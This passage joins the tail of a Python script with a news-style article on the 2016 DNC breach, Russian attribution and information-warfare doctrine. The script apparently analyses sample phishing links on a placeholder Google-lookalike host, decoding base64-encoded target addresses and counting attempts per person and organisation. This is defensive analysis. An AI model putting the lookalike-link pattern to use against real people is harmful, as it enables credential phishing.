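    return base64.urlsafe_b64encode(addr.encode()).decode().rstrip("=")


# Constructed sample: (short-link id, long URL the link resolved to).
_HOST = "http://accounts-google.example/ServiceLogin"  # placeholder lookalike
RESOLVED_LINKS = [
    ("s1", f"{_HOST}?e={_enc('spokesperson@gov.example')}&c=1"),
    ("s2", f"{_HOST}?e={_enc('spokesperson@gov.example')}&c=2"),
    ("s3", f"{_HOST}?e={_enc('spokesperson@gov.example')}&c=3"),
    ("s4", f"{_HOST}?e={_enc('scheduler@campaign.example')}"),
    ("s5", f"{_HOST}?e={_enc('press@campaign.example')}"),
    ("s6", f"{_HOST}?c=9"),            # no target parameter at all
    ("s7", f"{_HOST}?e=not.base64!"),  # malformed value
]


def is_lookalike(url: str, brand: str = "google", legit: str = "google.com") -> bool:
    """True when the host trades on the brand name but is not the real domain."""
    host = (urlparse(url).hostname or "").lower()
    genuine = host == legit or host.endswith("." + legit)
    return brand in host and not genuine


def decode_target(url: str, param: str = "e") -> Optional[str]:
    """Return the address encoded in the URL, or None if absent or undecodable."""
    values = parse_qs(urlparse(url).query).get(param)
    if not values:
        return None
    blob = values[0] + "=" * (-len(values[0]) % 4)  # restore stripped padding
    try:
        addr = base64.urlsafe_b64decode(blob).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return addr.lower() if "@" in addr else None


def tally_targets(links) -> Counter:
    """Count phishing attempts per decoded target address."""
    return Counter(t for _, url in links if (t := decode_target(url)))


def attempts_by_org(links) -> dict:
    """Roll attempts up to the target's mail domain for an organisation view."""
    per_org: Counter = Counter()
    for addr, n in tally_targets(links).items():
        per_org[addr.split("@", 1)[1]] += n
    return dict(per_org)


if __name__ == "__main__":
    for addr, n in tally_targets(RESOLVED_LINKS).most_common():
        print(f"{n:>2} attempts  {addr}")
    print(attempts_by_org(RESOLVED_LINKS))
```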

The DNC stopped using Google as a mail provider at some point.

But it is likely that some form of the phishing attack was used to drop the breach malware onto the DNC network. Both of these malware threats could have been on DNC's network for months before they were discovered.

The question that remains is why the attackers decided to leak what they had found instead of continuing to collect intelligence.

Finney said that it's possible that the e-mails were leaked only after the breach had been discovered as part of a disinformation operation.

The bad actors wanted to throw doubt on who actually hacked the DNC and to make it look like a "hacktivist" did it. The document released under the identity "Guccifer 2.0" appears to be a poorly constructed disinformation play, as Ars has reported previously. Much of the metadata associated with the documents points to a Russian (or at least Russian-speaking) actor being behind them.

The fact that the Guccifer dump happened after the intrusion was detected and had been attributed by CrowdStrike to Russia lends credence to the idea that the leaks were a hurried response to the intrusion being exposed.

But Michael Buratowski of Fidelis, the firm that performed the forensic analysis of the malware found at DNC, thinks the timing of the release of the e-mails shows intent to create chaos. "I do think that with what's been going on with the election cycle, it makes a lot of sense that this opportunity would be used... it's hard to speculate on what specific outcome [the attackers] were going for, but if nothing else, the amount of turmoil that [they've] created is pretty impactful with just the little bit of e-mail that's come out so far."

Game of Pwns

While the Fancy Bear and Cozy Bear threats have been identified in the past primarily as a means of intelligence collection, Russian attackers have gone for disruptive attacks before. Previous attacks have targeted Ukraine's power grid, Estonia's government and financial institutions, and government websites and systems in Georgia, culminating with the 2008 conflict over South Ossetia.

As with the DNC hack, it's difficult to tie those attacks to any specific organization in Russia.

But all evidence suggests they were done for the benefit of the Russian government. And disruption falls in line with Russian military and political doctrine.
Information warfare—including cyber attacks, "soft" cyber-like social media propaganda and disinformation, and the implication of the ability to inflict political and economic damage on potential or actual adversaries—is an integral part of Russian military doctrine.
Information warfare also factors into the Russian military-political concept of "containment"—preventing a potential adversary from attacks on Russia or threatening Russia's interests. Ever since Estonia, Latvia, and Lithuania joined the NATO alliance in 2004 (along with Bulgaria, Slovenia, and Slovakia), the Russian government has often stated that NATO's activities have threatened Russia's strategic interests.

The alignment of Ukraine with the West and recent tensions with Turkey over the downing of a Russian strike fighter over Syria are among the many factors that have added to Russia's belief that the US and NATO pose a direct threat to Putin's idea of Russian interests.

Lieutenant Colonel Petteri Lalu, head of the Concepts & Doctrine Division of the Finnish Defence Research Agency (FDRA), noted in a recent paper on Russian military theory that these sorts of "information operations" are seen as part of shaping "inter-state conflicts" regardless of whether they actually escalate to a military conflict. In fact, they're seen as a way to preempt possible military conflict. "Information operations, which can be non-military or military, are proceeding throughout the conflict, i.e. continuously," Lalu wrote. "In this sense, discussions on whether the term information war or warfare can be used before a clearly verified armed attack or an imminent threat of such an attack takes place, do sometimes sound unpractical."

Information warfare like the DNC breach fits into what the Soviet military theoretician Mikhail Tukhachevsky called "deep battle"—"influencing the enemy simultaneously throughout the whole depth of its territory." The main approach Russia has taken in information operations, Lalu noted, "has been breaking the unity of the target audience." Through its news media, through covert information operations, through use of social media (including Wikileaks and possibly fake Twitter accounts spewing populist/nationalist propaganda in various countries that the Russian government senses are vulnerable), and through hacking, Russia could seek to break the unity of NATO countries and undermine its military readiness.

Maybe the DNC e-mail leak was an attempt to snatch some strategic value out of what would otherwise have been a relatively fruitless (and embarrassing) intelligence collection mission.

But if Putin's government did in fact calculate a benefit from throwing a stick into the spokes of the Democratic presidential convention, there may be a lot more surprises in store.